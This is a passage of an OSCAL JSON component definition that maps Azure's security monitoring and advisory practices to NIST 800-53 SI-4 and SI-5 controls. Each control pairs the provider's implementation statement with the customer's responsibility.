mining. Azure filters network traffic to Azure subscriptions at the Management Group Level. All traffic not allowed by the relevant Network Baselines will be blocked, regardless of Network Security Group (NSG) configuration within Azure Subscriptions. Traffic is effectively filtered at each level of the resource stack. In order for network traffic to get to an asset, it needs to be allowed by all of the levels of security rules."}],"responsibilities":[{"uuid":"91e5c349-bf89-42b4-9db9-46b200d2fca2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-029"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for determining criteria for unusual or unauthorized activities or conditions for inbound and outbound communications traffic.","provided-uuid":"98c74be5-379d-4d5a-a267-c21597db3edb"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"22a8e450-5d18-48e3-8b2a-a0a7542f531b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-030"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4.4_smt.b","by-components":[{"uuid":"899a2ad8-50e6-4195-9fed-39193dfcfc6c","export":{"provided":[{"uuid":"e7db36e1-512f-4912-8857-61f39a48c4c1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-030"}],"description":"Azure monitors communications continually using the centralized monitoring, correlation, and analysis systems that manage the large amount of information generated by assets within the environment. In addition to standard logging and monitoring via asset logs described in the AU family, Azure performs network monitoring and detection of unauthorized connections via Network Isolation (NetIso), which provides the Network Risk Management Service (NRMS) for network baseline measurement, management, and enforcement. The service provides an assessment of network security and alerts on internet-exposed endpoints via Incident Management (IcM) based on analysis patterns for configuration issues. Any process that begins offering an open network port is flagged and investigated if it is not part of the approved baseline for that host to ensure detection of network services that have not been authorized as an indicator of compromise. Azure filters network traffic to Azure subscriptions at the Management Group Level. All traffic not allowed by the relevant Network Baselines will be blocked, regardless of Network Security Group (NSG) configuration within Azure Subscriptions. Traffic is effectively filtered at each level of the resource stack. In order for network traffic to get to an asset, it needs to be allowed by all of the levels of security rules."}],"responsibilities":[{"uuid":"362ba128-4567-42a6-813c-3f07ce4a547c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-030"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for monitoring customer-deployed resources, including the monitoring of inbound and outbound communications traffic at the customer-defined frequency for unusual or unauthorized activities/conditions.","provided-uuid":"e7db36e1-512f-4912-8857-61f39a48c4c1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"4cb2440f-35a1-4164-954b-925f660058fd","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4.5","statements":[{"uuid":"ab851943-e0b4-4d4e-bcdc-cac6ea5af930","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-031"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4.5_smt","by-components":[{"uuid":"ca9129f7-b986-41ea-98c3-c737980ea6d1","export":{"provided":[{"uuid":"158f77bd-d8a0-46b7-9fd2-b7c5d50a06d1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-031"}],"description":"Due to the size and complexity of the Azure environment, Azure utilizes event forwarding and monitoring tools to record events across Azure and correlate the events gathered by each logging tool. Log review cannot be conducted manually in the Azure environment due to the high volume of events. Instead, Azure implements automated methods to perform review, analysis, and reporting of logs. Azure Security Monitoring (ASM) and Scuba are used to do direct alerting using Incident Management (IcM) tickets on security-relevant events. These tools utilize event audit policies and detections that report events to the Security Response Team and service teams as appropriate._x000D_ _x000D_ Once processed, the Security Response Team reviews and analyzes alerts generated by the automated review of audit records in real time. Events that meet a pattern of a known attack methodology are delivered to the appropriate service teams via IcM or email. These teams review and analyze the activities detailed in the alerts in accordance with Troubleshooting Guides (TSGs) attached to the ticketed alert. The alerting system provides 24/7 response capability._x000D_ _x000D_"}],"responsibilities":[{"uuid":"cdcd9668-8208-46f6-91a4-7bdb59025278","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-031"}],"description":"The customer is responsible for providing monitoring alerts for customer-deployed resources to customer-defined personnel or roles when specified indications of compromise or potential compromise occur.","provided-uuid":"158f77bd-d8a0-46b7-9fd2-b7c5d50a06d1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b1d0da87-73cf-40d7-a822-09d3c686bf22","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4.10","statements":[{"uuid":"4df9be01-7c2c-4a8a-a1dc-4988a620ae71","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-032"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4.10_smt","by-components":[{"uuid":"c628dc42-e53c-4326-b510-48502782bf0a","export":{"provided":[{"uuid":"ffefa3e3-8b40-49ce-8a30-7ac10e1565bb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-032"}],"description":"For Azure services, onboarding to Azure Security Pack (AzSecPack) enables monitoring of network communication correlated with network logs and in-memory lateral movement during post exploitation for all deployment types via Process Investigation, which is available externally via Microsoft Defender for Cloud via Fileless Attack detections, and via the Network Risk Management (NRM) Service. The NRM service assesses the resultant set of open ports and protocols based on data provided by the VM agent. Additionally, for VMs hosted on Azure, the Network Security Group (NSG) settings are considered and the resultant set of the settings is calculated. Additionally, for the assets running in Bare Metal, Azure assesses the Surface Area Manager configuration settings. For Linux VMs hosted in Azure, Azure uses the NSG settings to validate that the configuration meets the network baseline requirements. For all deployment types, if there is a network baseline violation that exposes a management port to the internet, an alert is generated and routed to the service team. For internal service teams, Azure implements monitoring and alerting for unusual behavior of key security features including, but not limited to, if a user accesses an asset without using Azure Just In Time (JIT) access, if a dSTS account has an unusual access pattern, if the Geneva Actions have unusual activity, if the Azure Fabric is accessed without using Azure JIT, or if a service owner has unexpected changes to permissions in the service team subscription. Additionally, internal services regardless of deployment type monitor their own network connections for unexpected network activities at the application layer. However, to protect customer end user identifiable information, Azure does not monitor the customer traffic in the security monitoring solutions."}],"responsibilities":[{"uuid":"5783d4f7-427b-4db6-a406-e7ba9a6f95c2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-032"}],"description":"The customer is responsible for making provisions so that customer-defined encrypted communications traffic is visible to information system monitoring tools.","provided-uuid":"ffefa3e3-8b40-49ce-8a30-7ac10e1565bb"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"2201ab24-c217-49b8-9096-feec02895d49","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4.11","statements":[{"uuid":"c5754dd8-a4bc-4b06-a9a2-2e80ccb190ee","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-033"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"si-4.11_smt","by-components":[{"uuid":"b552e208-d7f9-4841-8d10-87fce68e7778","export":{"provided":[{"uuid":"0d7d3332-bb06-4d49-837a-259a52cb08c9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-033"}],"description":"For Azure services, onboarding to Azure Security Pack enables monitoring of network communication correlated with network logs and in-memory lateral movement during post exploitation for all deployment types via Process Investigation, which is available externally via Azure Security Center via Fileless Attack detections, and via the Network Risk Management (NRM) Service. The NRM service assesses the resultant set of open ports and protocols based on data provided by the VM agent. Additionally, for VMs hosted on Azure, the Network Security Group (NSG) settings are considered and the resultant set of the settings is calculated. Additionally, for the assets running in Bare Metal, Azure assesses the Surface Area Manager configuration settings. For Linux VMs hosted in Azure, Azure uses the NSG settings to validate that the configuration meets the network baseline requirements. For all deployment types, if there is a network baseline violation that exposes a management port to the internet, an alert is generated and routed to the service team._x000D_ _x000D_ For internal service teams, Azure implements monitoring and alerting for unusual behavior of key security features including, but not limited to, if a user accesses an asset without using Azure Just In Time (JIT) access, if a dSTS account has an unusual access pattern, if the Geneva Actions have unusual activity, if the Azure Fabric is accessed without using Azure JIT, or if a service owner has unexpected changes to permissions in the service team subscription._x000D_ _x000D_ Additionally, internal services regardless of deployment type monitor their own network connections for unexpected network activities at the application layer. However, to protect customer end user identifiable information, Azure does not monitor the customer traffic in the security monitoring solutions._x000D_ _x000D_"}],"responsibilities":[{"uuid":"5ba81437-b0de-46f3-8e20-9184a65787df","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-033"}],"description":"The customer is responsible for analyzing communications traffic anomalies for customer-deployed resources, including an analysis of outbound communications traffic at the external boundary and at customer-defined interior points within the system to discover anomalies.","provided-uuid":"0d7d3332-bb06-4d49-837a-259a52cb08c9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ae2e74c5-205d-445a-a1de-2e8814d735c6","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4.12","statements":[{"uuid":"e3d41eb4-144d-41ec-ac7b-9b48a66f164a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-034"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4.12_smt","by-components":[{"uuid":"712f92a1-9f69-4792-a393-ef438b1f0f5e","export":{"provided":[{"uuid":"608d9ed0-83ae-46c8-b608-2c538ba1871e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-034"}],"description":"When Azure Security receives notification of inappropriate or unusual activities, they alert appropriate personnel using automated mechanisms such as Azure DevOps, Incident Management (IcM), Service 360 (S360), and email."}],"responsibilities":[{"uuid":"86cafcc4-ddbd-4262-8e17-ed70aee0017d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-034"}],"description":"The customer is responsible for alerting security personnel using automated mechanisms of customer-defined inappropriate or unusual activities with security and privacy implications occur.","provided-uuid":"608d9ed0-83ae-46c8-b608-2c538ba1871e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"abfb2e3b-b71e-4a42-a219-00cb2b50af64","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4.14","statements":[{"uuid":"f5d417cd-a17a-411f-abc0-98c775f8b43d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-035"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4.14_smt","by-components":[{"uuid":"3a8091e3-ad88-401c-a03d-f5acf07bbce5","export":{"provided":[{"uuid":"57784092-3af8-45c4-81c9-679e73a47219","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-035"}],"description":"Wireless access is not permitted within the Azure environment. Azure regularly scans for rogue wireless signals at least quarterly within the Azure datacenters. Results are logged and documented by the Azure Security Response Team. Any rogue signals are investigated and removed. The involvement of the Azure Security Response Team will initiate the processes outlined on the IR control family section of this SSP. Refer to that IR control family section to identify incident response processes and procedures."}],"responsibilities":[{"uuid":"2e8fa9a7-760b-4220-9395-d955c3a7ad02","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-035"}],"description":"The customer is responsible for employing a wireless intrusion detection system to identify rogue wireless devices and to detect attack attempts and potential compromises or breaches to customer managed resources.","provided-uuid":"57784092-3af8-45c4-81c9-679e73a47219"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"19d279db-e4e9-43ce-85b4-f243b2de7346","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4.16","statements":[{"uuid":"89326254-c00c-4ad3-b29d-59ef18fe1380","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-036"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4.16_smt","by-components":[{"uuid":"86af2bd4-2de0-4ff9-9627-72d3feb62036","export":{"provided":[{"uuid":"6fc19620-0bf6-42b0-ab15-20fee3908891","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-036"}],"description":"All Azure assets upload logs to Geneva Monitoring for aggregation and analysis. Reports are generated from this data and cover system-wide intrusion detections._x000D_ _x000D_"}],"responsibilities":[{"uuid":"fbfa170c-657a-4635-8562-f36c415a8030","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-036"}],"description":"The customer is responsible for correlating monitoring information.","provided-uuid":"6fc19620-0bf6-42b0-ab15-20fee3908891"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"7a96939e-7fa1-4ed6-90f4-336df32f1a8f","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4.18","statements":[{"uuid":"e8bb6626-395f-4c2b-aa7f-db3ea1e13c5d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-037"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"si-4.18_smt","by-components":[{"uuid":"dd363ab1-a059-43d4-9ba6-378427297685","export":{"provided":[{"uuid":"9ca060be-5616-4362-99fa-3892a5963a85","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-037"}],"description":"For Azure services, onboarding to Azure Security Pack enables monitoring of network communication correlated with network logs and in-memory lateral movement during post exploitation for all deployment types via Process Investigation, which is available externally via Azure Security Center via Fileless Attack detections, and via the Network Risk Management (NRM) Service. The NRM service assesses the resultant set of open ports and protocols based on data provided by the VM agent. Additionally, for VMs hosted on Azure, the Network Security Group (NSG) settings are considered and the resultant set of the settings is calculated. Additionally, for the assets running in Bare Metal, Azure assesses the Surface Area Manager configuration settings. For Linux VMs hosted in Azure, Azure uses the NSG settings to validate that the configuration meets the network baseline requirements. For all deployment types, if there is a network baseline violation that exposes a management port to the internet, an alert is generated and routed to the service team._x000D_ _x000D_ For internal service teams, Azure implements monitoring and alerting for unusual behavior of key security features including, but not limited to, if a user accesses an asset without using Azure Just In Time (JIT) access, if a dSTS account has an unusual access pattern, if the Geneva Actions have unusual activity, if the Azure Fabric is accessed without using Azure JIT, or if a service owner has unexpected changes to permissions in the service team subscription._x000D_ _x000D_ Additionally, internal services regardless of deployment type monitor their own network connections for unexpected network activities at the application layer. However, to protect customer end user identifiable information, Azure does not monitor the customer traffic in the security monitoring solutions._x000D_ _x000D_"}],"responsibilities":[{"uuid":"9e6ec3d1-5484-4961-920a-57a7ee266bcb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-037"}],"description":"The customer is responsible for analyzing communications traffic for customer-deployed resources, including an analysis of outbound communications traffic at the external boundary and at customer-defined interior points within the system to detect covert exfiltration of information.","provided-uuid":"9ca060be-5616-4362-99fa-3892a5963a85"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a0353c3f-6a81-46c3-8cad-99ba65116042","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4.19","statements":[{"uuid":"45daa2ee-6bdc-4e86-82fb-1d41ec5c4cfc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-038"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4.19_smt","by-components":[{"uuid":"e71a274d-62c4-4503-bc23-4969264359b5","export":{"provided":[{"uuid":"61801dc2-703e-4b10-8bff-bced07a02db5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-038"}],"description":"In the case where Azure identifies an individual as posing an increased level of risk, that individual's access is revoked. The Security Response Team takes special interest in data generated by existing monitoring solutions to identify any malicious actions the individual may attempt. The Security Response Team responds to requests by HR and engineering groups to take emergency action on high risk accounts, such as emergency account disablement. The Security Response Team also maintains auditable events of account activity that can be used in Security Response Team investigations._x000D_ _x000D_"}],"responsibilities":[{"uuid":"a136f111-ef06-4d67-b2c1-6b0e04d8e01d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-038"}],"description":"The customer is responsible for monitoring individuals who pose a greater risk.","provided-uuid":"61801dc2-703e-4b10-8bff-bced07a02db5"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"04867058-09ff-40ff-a80f-5e00fd57a699","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4.20","statements":[{"uuid":"ec91c5f4-1b2e-4647-9ee8-5b24ab1d2e33","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-039"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4.20_smt","by-components":[{"uuid":"406df4f7-039a-4c5b-a7a4-83eec364426a","export":{"provided":[{"uuid":"fa5920ad-7c79-4d9b-844c-8d3bd6b1d5bc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-039"}],"description":"The Security Response Team uses all logs and tools to monitor personnel as necessary. In addition to the auditable event activity, custom alerts are generated for specific elevated access user accounts such as local administrators. The alerts are investigated by the Security Response Team in accordance with the incident management procedures._x000D_ _x000D_"}],"responsibilities":[{"uuid":"787b121f-3a66-4130-a6e2-3936a7434bfa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-039"}],"description":"The customer is responsible for monitoring privileged users.","provided-uuid":"fa5920ad-7c79-4d9b-844c-8d3bd6b1d5bc"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"dc35660a-a88b-44ab-a7ff-476d1dae6259","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4.22","statements":[{"uuid":"91a54fa3-db0e-470a-9d22-4f4c4547f82c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-040"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4.22_smt","by-components":[{"uuid":"b0648ecc-696d-4fde-8c50-d8bf76784e3f","export":{"provided":[{"uuid":"92875ad1-475b-453b-99cc-b2cc0ba8783b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-040"}],"description":"Azure detects network services that have not been authorized or approved by the Azure Change and Release Management process. If an unauthorized network service is discovered, the Azure LiveSite (WALS) team investigates the issue following the incident management process. Azure tracks network connections that are opened by the processes running on the host. Any process that begins offering an open network port is flagged and investigated if it is not part of the approved baseline for that host, ensure detection of network services that have not been authorized as an indicator of compromise. In addition, the implemented host-based SDN firewall uses a default deny all policy._x000D_ _x000D_ Azure enforces a default deny policy which restricts communication to certain areas by firewall zones that are explicitly permitted. For any policy change, a detailed request with justification must be submitted and approved by C+AI Security through the standard security process._x000D_ _x000D_"}],"responsibilities":[{"uuid":"11678573-1dce-4ef6-aa9f-1b22069cf160","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-040"}],"description":"The customer is responsible for detecting network services that have not been authorized or approved by customer-defined processes, and for auditing or alerting customer-defined personnel or roles.","provided-uuid":"92875ad1-475b-453b-99cc-b2cc0ba8783b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"988afa0d-cccd-484d-9d9c-3fcf3751dddb","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-4.23","statements":[{"uuid":"2132719b-e1a6-445e-b4db-688bd8076963","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-041"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-4.23_smt","by-components":[{"uuid":"2f165def-0f20-4572-9ff6-42d319f54219","export":{"provided":[{"uuid":"fa30c70e-de64-4377-aca4-290b1e5d860f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-041"}],"description":"All hosts within Azure have event logging enabled. If this functionality is turned off or unsuccessful, an alert is generated through Geneva Monitoring and the alert is investigated as a security incident. Assets are each configured with an Event Forwarding Tool. The Event Forwarding Tool sends audit records to the Security Incident and Event Management Tool via an event collection infrastructure which also archives security events within the environment. This event forwarding occurs in real time for the interconnected system. Additionally, anti-virus software is configured to scan, real-time, files incoming to the system and quarantines them if determined to be malicious. Alerts from clients are logged in the anti-virus software database and the alerts for malware-related events are sent in near-real time to the Security Response Team three ways. This happens via alerts/tickets, emails to Security Response Team, and a feed to the security incident and event management tool._x000D_ _x000D_ Azure Security Pack (AzSecPack) enables monitoring of network communication correlated with network logs and in-memory lateral movement during post exploitation for all deployment types via Process Investigation, which is available externally via Fileless Attack detections from Azure Security Center, and via the Network Risk Management (NRM) Service. AzSecPack is automatically enabled for applicable Azure assets via a centrally managed configuration. Monitoring of missing AzSecPack is implemented by Azure Security Monitoring (ASM)._x000D_ _x000D_"}],"responsibilities":[{"uuid":"34274732-724f-4c7b-a6ab-8c62f199b297","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-041"}],"description":"The customer is responsible for implementing host-based monitoring for customer-deployed resources.","provided-uuid":"fa30c70e-de64-4377-aca4-290b1e5d860f"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"8571842f-0784-4283-b0f9-dfd6d399e7c6","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-5","statements":[{"uuid":"21678a8e-b1ed-4c51-820c-4d0008e7fbda","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-042"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-5_smt.a","by-components":[{"uuid":"7fee43f8-922d-42f4-b9d6-9360f1f6e0ad","export":{"provided":[{"uuid":"6faa7e6f-edfe-49ea-b529-cfb2b491dfa7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-042"}],"description":"For all asset types, Azure receives information system security alerts, advisories, and directives from external vendors, parties providing software within the Azure environment, and external security organizations including US-CERT and other external parties performing independent vulnerability analysis. In addition, customers can report security incidents at any time through the Azure Management Portal or via a twenty-four (24) hours a day, seven (7) days a week dedicated phone line that is available._x000D_ _x000D_ Internally, Microsoft's Security Response Team notifies service teams of security incidents and the latest security patches for Microsoft's software platforms. The Microsoft Security Response Center (MSRC) also publishes Security Bulletins and associated patches every month except when MSRC determines that an out-of-band patch is required for addressing zero-day vulnerabilities or escalations. Working with MSRC and Security Response Team, external parties such as regulators, law enforcement, ISPs, and other partners can identify security issues. Service teams also subscribe to service-specific alerts, advisories, and directives as needed._x000D_ _x000D_ Azure is also made aware of any directives or advisories through the FedRAMP Program Management Office (PMO), the DISA/DoD authorizing officials, and other authorizing officials, which send email alerts to provide situational awareness and any actions that all CSPs must take._x000D_"}],"responsibilities":[{"uuid":"8172a365-ccb4-4887-ba83-1f7538640262","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-042"}],"description":"The customer is responsible for receiving security alerts, advisories, and directives from customer-defined external organizations on an ongoing basis.","provided-uuid":"6faa7e6f-edfe-49ea-b529-cfb2b491dfa7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"e3327987-bb68-4e73-bd1b-b8f186da5b5c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-043"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-5_smt.b","by-components":[{"uuid":"9ba9ad9c-fcfa-4d9b-9de8-cc0ce78b45bd","export":{"provided":[{"uuid":"ff3726dc-64e1-426e-afa4-814aebdf2d47","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-043"}],"description":"Internally, Microsoft's Security Response Team notifies service teams of security incidents which occur within the physical environment against Azure datacenters and boundary network devices. MSRC notifies service teams around the latest security patches for Microsoft's software platforms. MSRC also publishes Security Bulletins and associated patches on the second Tuesday of every month except when MSRC determines that an out-of-band patch is required for addressing zero-day vulnerabilities or escalations._x000D_ _x000D_"}],"responsibilities":[{"uuid":"910cd451-83e0-482b-92e2-29257bd282a4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-043"}],"description":"The customer is responsible for generating internal security alerts, advisories, and directives as deemed 